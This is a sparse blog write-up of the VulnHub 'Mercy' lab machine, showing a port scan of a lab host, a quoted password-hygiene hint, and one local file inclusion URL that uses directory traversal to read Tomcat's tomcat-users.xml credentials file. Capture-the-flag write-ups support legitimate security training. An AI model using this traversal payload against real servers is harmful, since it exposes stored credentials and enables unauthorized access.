Vulnhub-Mercy

Rustscan

PORT     STATE SERVICE     REASON         VERSION              
53/tcp open domain syn-ack ttl 64 ISC BIND 9.9.5-3ubuntu0.17 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.9.5-3ubuntu0.17-Ubuntu
110/tcp open pop3? syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
139/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap syn-ack ttl 64 Dovecot imapd
|_ssl-date: TLS randomness does not represent time
445/tcp open netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
993/tcp open ssl/imaps? syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
995/tcp open ssl/pop3s? syn-ack ttl 64
|_ssl-date: TLS randomness does not represent time
8080/tcp open http syn-ack ttl 64 Apache Tomcat/Coyote JSP engine 1.1
| http-methods:
| Supported Methods: GET HEAD POST PUT DELETE OPTIONS
|_ Potentially risky methods: PUT DELETE
|_http-open-proxy: Proxy might be redirecting requests
| http-robots.txt: 1 disallowed entry
|_/tryharder/tryharder
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat
MAC Address: 80:00:0B:3C:4A:7E (Intel Corporate)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4

PORT 139/445 (SMB)

PORT 8080 (HTTP Apache Tomcat 7)

It's annoying, but we repeat this over and over again: cyber hygiene is extremely important. Please stop setting silly passwords that will get cracked with any decent password list.Once, we found the password "password", quite literally sticking on a post-it in front of an employee's desk! As silly as it may be, the employee pleaded for mercy when we threatened to fire her.No fluffy bunnies for those who set insecure passwords and endanger the enterprise.

PORT 80 (HTTP)

http://192.168.1.9/nomercy/windows/code.php?file=../../../../../../var/lib/tomcat7/conf/tomcat-users.xml

--

--

--

Pentester | CTF Player

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Cloud Native Applications — What it takes to build one?

Creating an iMessage sticker pack

Should Developers Time Track?

Active directory journey to the cloud, Part-1: Setup

Open Source as a Relay Race

How to Use Go With MongoDB

Web 2 and Web 3; The Conflict of Two Generations.

Metrics from k8s logs

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
ARZ101

ARZ101

Pentester | CTF Player

More from Medium

HackTheBox — Resolute

Shocker | HackTheBox writeup

HackTheBox — Shibboleth Writeup